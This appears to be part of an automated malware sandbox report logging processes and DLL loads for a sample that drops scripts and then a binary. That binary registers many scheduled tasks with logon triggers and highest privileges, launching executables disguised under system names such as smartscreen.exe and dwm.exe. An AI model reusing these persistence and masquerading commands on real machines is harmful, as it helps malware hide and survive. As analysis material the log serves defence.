                                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\ComproviderComponentIntocommon\9j6CCih.bat" "
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\ComproviderComponentIntocommon\Portsessionsvc.exe "C:\ComproviderComponentIntocommon/Portsessionsvc.exe"
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "smartscreens" /sc MINUTE /mo 7 /tr "'C:\Windows\Resources\Themes\smartscreen.exe'" /f
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "smartscreen" /sc ONLOGON /tr "'C:\Windows\Resources\Themes\smartscreen.exe'" /rl HIGHEST /f
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "smartscreens" /sc MINUTE /mo 10 /tr "'C:\Windows\Resources\Themes\smartscreen.exe'" /rl HIGHEST /f
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jgewpxd5\jgewpxd5.cmdline"
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESF1F4.tmp" "c:\Windows\System32\CSC14843E573E24440A98F4B13FC0AF1E.TMP"
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 9 /tr "'C:\Recovery\dwm.exe'" /f
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "dwm" /sc ONLOGON /tr "'C:\Recovery\dwm.exe'" /rl HIGHEST /f
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 13 /tr "'C:\Recovery\dwm.exe'" /rl HIGHEST /f
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "iEIWJugOSvvEyboGDFYpQi" /sc MINUTE /mo 10 /tr "'C:\Users\All Users\iEIWJugOSvvEyboGDFYpQ.exe'" /f
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "iEIWJugOSvvEyboGDFYpQ" /sc ONLOGON /tr "'C:\Users\All Users\iEIWJugOSvvEyboGDFYpQ.exe'" /rl HIGHEST /f
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "iEIWJugOSvvEyboGDFYpQi" /sc MINUTE /mo 8 /tr "'C:\Users\All Users\iEIWJugOSvvEyboGDFYpQ.exe'" /rl HIGHEST /f
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "ctfmonc" /sc MINUTE /mo 13 /tr "'C:\ComproviderComponentIntocommon\ctfmon.exe'" /f
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "ctfmon" /sc ONLOGON /tr "'C:\ComproviderComponentIntocommon\ctfmon.exe'" /rl HIGHEST /f
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "ctfmonc" /sc MINUTE /mo 5 /tr "'C:\ComproviderComponentIntocommon\ctfmon.exe'" /rl HIGHEST /f
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "iEIWJugOSvvEyboGDFYpQi" /sc MINUTE /mo 8 /tr "'C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exe'" /f
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "iEIWJugOSvvEyboGDFYpQ" /sc ONLOGON /tr "'C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exe'" /rl HIGHEST /f
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "iEIWJugOSvvEyboGDFYpQi" /sc MINUTE /mo 8 /tr "'C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exe'" /rl HIGHEST /f
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "PortsessionsvcP" /sc MINUTE /mo 9 /tr "'C:\ComproviderComponentIntocommon\Portsessionsvc.exe'" /f
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "Portsessionsvc" /sc ONLOGON /tr "'C:\ComproviderComponentIntocommon\Portsessionsvc.exe'" /rl HIGHEST /f
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "PortsessionsvcP" /sc MINUTE /mo 9 /tr "'C:\ComproviderComponentIntocommon\Portsessionsvc.exe'" /rl HIGHEST /f
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\jdisWpWAyY.bat"
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                                    Source: unknownProcess created: C:\ComproviderComponentIntocommon\ctfmon.exe C:\ComproviderComponentIntocommon\ctfmon.exe
                                    Source: unknownProcess created: C:\ComproviderComponentIntocommon\ctfmon.exe C:\ComproviderComponentIntocommon\ctfmon.exe
                                    Source: unknownProcess created: C:\Recovery\dwm.exe C:\Recovery\dwm.exe
                                    Source: unknownProcess created: C:\Recovery\dwm.exe C:\Recovery\dwm.exe
                                    Source: unknownProcess created: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exe C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exe
                                    Source: unknownProcess created: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exe C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exe
                                    Source: unknownProcess created: C:\ComproviderComponentIntocommon\Portsessionsvc.exe C:\ComproviderComponentIntocommon\Portsessionsvc.exe
                                    Source: unknownProcess created: C:\ComproviderComponentIntocommon\Portsessionsvc.exe C:\ComproviderComponentIntocommon\Portsessionsvc.exe
                                    Source: unknownProcess created: C:\Windows\Resources\Themes\smartscreen.exe C:\Windows\Resources\Themes\smartscreen.exe
                                    Source: unknownProcess created: C:\Windows\Resources\Themes\smartscreen.exe C:\Windows\Resources\Themes\smartscreen.exe
                                    Source: unknownProcess created: C:\Windows\Resources\Themes\smartscreen.exe "C:\Windows\Resources\Themes\smartscreen.exe"
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exe "C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exe"
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\Ycxw1CWDXu.bat"
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                    Source: C:\Users\user\Desktop\EjS7Q5fFCE.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\ComproviderComponentIntocommon\9ILuIMngNdMuzngHHMAY9BVvKTDwm0yZ13RpFsRY.vbe" Jump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\ComproviderComponentIntocommon\9j6CCih.bat" "Jump to behavior
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\ComproviderComponentIntocommon\Portsessionsvc.exe "C:\ComproviderComponentIntocommon/Portsessionsvc.exe"Jump to behavior
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jgewpxd5\jgewpxd5.cmdline"Jump to behavior
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\jdisWpWAyY.bat" Jump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESF1F4.tmp" "c:\Windows\System32\CSC14843E573E24440A98F4B13FC0AF1E.TMP"Jump to behavior
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001Jump to behavior
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhostJump to behavior
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exe "C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exe" Jump to behavior
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\Ycxw1CWDXu.bat"
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                    Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                                    Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                                    Source: C:\Users\user\Desktop\EjS7Q5fFCE.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
                                    Source: C:\Users\user\Desktop\EjS7Q5fFCE.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
                                    Source: C:\Users\user\Desktop\EjS7Q5fFCE.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
                                    Source: C:\Users\user\Desktop\EjS7Q5fFCE.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
                                    Source: C:\Users\user\Desktop\EjS7Q5fFCE.exeSection loaded: <pi-ms-win-core-localization-l1-2-1.dllJump to behavior
                                    Source: C:\Users\user\Desktop\EjS7Q5fFCE.exeSection loaded: version.dllJump to behavior
                                    Source: C:\Users\user\Desktop\EjS7Q5fFCE.exeSection loaded: dxgidebug.dllJump to behavior
                                    Source: C:\Users\user\Desktop\EjS7Q5fFCE.exeSection loaded: sfc_os.dllJump to behavior
                                    Source: C:\Users\user\Desktop\EjS7Q5fFCE.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Users\user\Desktop\EjS7Q5fFCE.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\Users\user\Desktop\EjS7Q5fFCE.exeSection loaded: uxtheme.dllJump to behavior
                                    Source: C:\Users\user\Desktop\EjS7Q5fFCE.exeSection loaded: dwmapi.dllJump to behavior
                                    Source: C:\Users\user\Desktop\EjS7Q5fFCE.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\Users\user\Desktop\EjS7Q5fFCE.exeSection loaded: riched20.dllJump to behavior
                                    Source: C:\Users\user\Desktop\EjS7Q5fFCE.exeSection loaded: usp10.dllJump to behavior
                                    Source: C:\Users\user\Desktop\EjS7Q5fFCE.exeSection loaded: msls31.dllJump to behavior
                                    Source: C:\Users\user\Desktop\EjS7Q5fFCE.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Users\user\Desktop\EjS7Q5fFCE.exeSection loaded: windowscodecs.dllJump to behavior
                                    Source: C:\Users\user\Desktop\EjS7Q5fFCE.exeSection loaded: textshaping.dllJump to behavior
                                    Source: C:\Users\user\Desktop\EjS7Q5fFCE.exeSection loaded: textinputframework.dllJump to behavior
                                    Source: C:\Users\user\Desktop\EjS7Q5fFCE.exeSection loaded: coreuicomponents.dllJump to behavior
                                    Source: C:\Users\user\Desktop\EjS7Q5fFCE.exeSection loaded: coremessaging.dllJump to behavior
                                    Source: C:\Users\user\Desktop\EjS7Q5fFCE.exeSection loaded: ntmarta.dllJump to behavior
                                    Source: C:\Users\user\Desktop\EjS7Q5fFCE.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\Users\user\Desktop\EjS7Q5fFCE.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\Users\user\Desktop\EjS7Q5fFCE.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\Users\user\Desktop\EjS7Q5fFCE.exeSection loaded: windows.storage.dllJump to behavior
                                    Source: C:\Users\user\Desktop\EjS7Q5fFCE.exeSection loaded: wldp.dllJump to behavior
                                    Source: C:\Users\user\Desktop\EjS7Q5fFCE.exeSection loaded: propsys.dllJump to behavior
                                    Source: C:\Users\user\Desktop\EjS7Q5fFCE.exeSection loaded: profapi.dllJump to behavior
                                    Source: C:\Users\user\Desktop\EjS7Q5fFCE.exeSection loaded: edputil.dllJump to behavior
                                    Source: C:\Users\user\Desktop\EjS7Q5fFCE.exeSection loaded: urlmon.dllJump to behavior
                                    Source: C:\Users\user\Desktop\EjS7Q5fFCE.exeSection loaded: iertutil.dllJump to behavior
                                    Source: C:\Users\user\Desktop\EjS7Q5fFCE.exeSection loaded: srvcli.dllJump to behavior
                                    Source: C:\Users\user\Desktop\EjS7Q5fFCE.exeSection loaded: netutils.dllJump to behavior
                                    Source: C:\Users\user\Desktop\EjS7Q5fFCE.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                    Source: C:\Users\user\Desktop\EjS7Q5fFCE.exeSection loaded: policymanager.dllJump to behavior
                                    Source: C:\Users\user\Desktop\EjS7Q5fFCE.exeSection loaded: msvcp110_win.dllJump to behavior
                                    Source: C:\Users\user\Desktop\EjS7Q5fFCE.exeSection loaded: appresolver.dllJump to behavior
                                    Source: C:\Users\user\Desktop\EjS7Q5fFCE.exeSection loaded: bcp47langs.dllJump to behavior
                                    Source: C:\Users\user\Desktop\EjS7Q5fFCE.exeSection loaded: slc.dllJump to behavior
                                    Source: C:\Users\user\Desktop\EjS7Q5fFCE.exeSection loaded: userenv.dllJump to behavior
                                    Source: C:\Users\user\Desktop\EjS7Q5fFCE.exeSection loaded: sppc.dllJump to behavior
                                    Source: C:\Users\user\Desktop\EjS7Q5fFCE.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                    Source: C:\Users\user\Desktop\EjS7Q5fFCE.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                    Source: C:\Users\user\Desktop\EjS7Q5fFCE.exeSection loaded: pcacli.dllJump to behavior
                                    Source: C:\Users\user\Desktop\EjS7Q5fFCE.exeSection loaded: mpr.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: gpapi.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.storage.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: apphelp.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dlnashext.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wpdshext.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: edputil.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: urlmon.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iertutil.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: srvcli.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: netutils.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: appresolver.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: slc.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sppc.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeSection loaded: mscoree.dllJump to behavior
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeSection loaded: apphelp.dllJump to behavior
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeSection loaded: version.dllJump to behavior
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeSection loaded: uxtheme.dllJump to behavior
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeSection loaded: windows.storage.dllJump to behavior
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeSection loaded: wldp.dllJump to behavior
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeSection loaded: profapi.dllJump to behavior
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeSection loaded: cryptsp.dllJump to behavior
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeSection loaded: ktmw32.dllJump to behavior
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeSection loaded: ntmarta.dllJump to behavior
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeSection loaded: wbemcomn.dllJump to behavior
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeSection loaded: amsi.dllJump to behavior
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeSection loaded: userenv.dllJump to behavior
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeSection loaded: propsys.dllJump to behavior
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeSection loaded: dlnashext.dllJump to behavior
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeSection loaded: wpdshext.dllJump to behavior
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeSection loaded: edputil.dllJump to behavior
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeSection loaded: urlmon.dllJump to behavior
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeSection loaded: iertutil.dllJump to behavior
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeSection loaded: srvcli.dllJump to behavior
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeSection loaded: netutils.dllJump to behavior
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeSection loaded: appresolver.dllJump to behavior
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeSection loaded: bcp47langs.dllJump to behavior
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeSection loaded: slc.dllJump to behavior
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeSection loaded: sppc.dllJump to behavior
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
